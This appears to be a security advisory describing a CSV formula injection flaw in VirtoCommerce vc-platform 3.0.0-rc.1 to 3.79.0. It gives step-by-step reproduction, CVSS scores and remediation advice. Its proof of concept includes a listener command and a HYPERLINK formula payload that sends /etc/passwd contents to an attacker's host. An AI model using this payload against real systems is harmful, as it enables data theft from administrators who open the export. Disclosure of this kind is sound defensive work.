We found results for “”
WS-2021-0489
Date: December 15, 2021
Overview
In “vc-platform(VirtoCommerce)” 3.0.0-rc.1 to 3.79.0 an attacker with low privileges can create a new product with malicious CSV commands in the title of the product. After that, when the administrator exports the data in CSV format, there is no check of the Title field of the product which can lead to execution of arbitrary commands on the system.Details
In “vc-platform(VirtoCommerce)” an attacker with low privileges can create a new product with malicious CSV commands in the title of the product. After that, when the administrator exports the data in CSV format, there is no check of the Title field of the product which can lead to execution of arbitrary commands on the system.PoC Details
Login to the application with a manager role user that has administrative privileges for the electronics store. This is considered low privileges (this is not an administrative role of the application). Click on the “More” option from the left pane and then click the “Catalog” option. Click on the “Clothing” section, then click the “Accessories” section. Then select the bags section and create a new product: choose “physical product” and insert the following payload in the Name field of the product and click create.Then login as admin and export the products (go to the same page as you did with the first user and click the “export” button ->VirtoCommerce Csv Export -> Start Export). You’ll be provided with a download link. Click it and open the csv file. Click the name of our product (test-poc) and you’ll be referred to an unknown page. Look at the terminal on the attacker server and you’ll see that the passwd file content was sent there.
PoC Code
Set up a server:
Python3 -m http.server yourPort --bind=yourIP
Payload:
=HYPERLINK(CONCATENATE("http://yourIP:yourPort/123.txt?v="; ('file:///etc/passwd'#$passwd.A1)); "test-poc")
Affected Environments
3.0.0-rc.1 to 3.79.0Remediation
To Remediate it, ensure that no cells begin with any of the following characters:Equals to (“=”)
Plus (“+”)
Minus (“-“)
At (“@”)
Tab (0x09)
Carriage return (0x0D)
Prevention
no fixLanguage: C#
Good to know:
Improper Neutralization of Formula Elements in a CSV File
CWE-1236Upgrade Version
No fix version available
Base Score: |
|
---|---|
Attack Vector (AV): | Network |
Attack Complexity (AC): | Low |
Privileges Required (PR): | Low |
User Interaction (UI): | Required |
Scope (S): | Changed |
Confidentiality (C): | High |
Integrity (I): | High |
Availability (A): | High |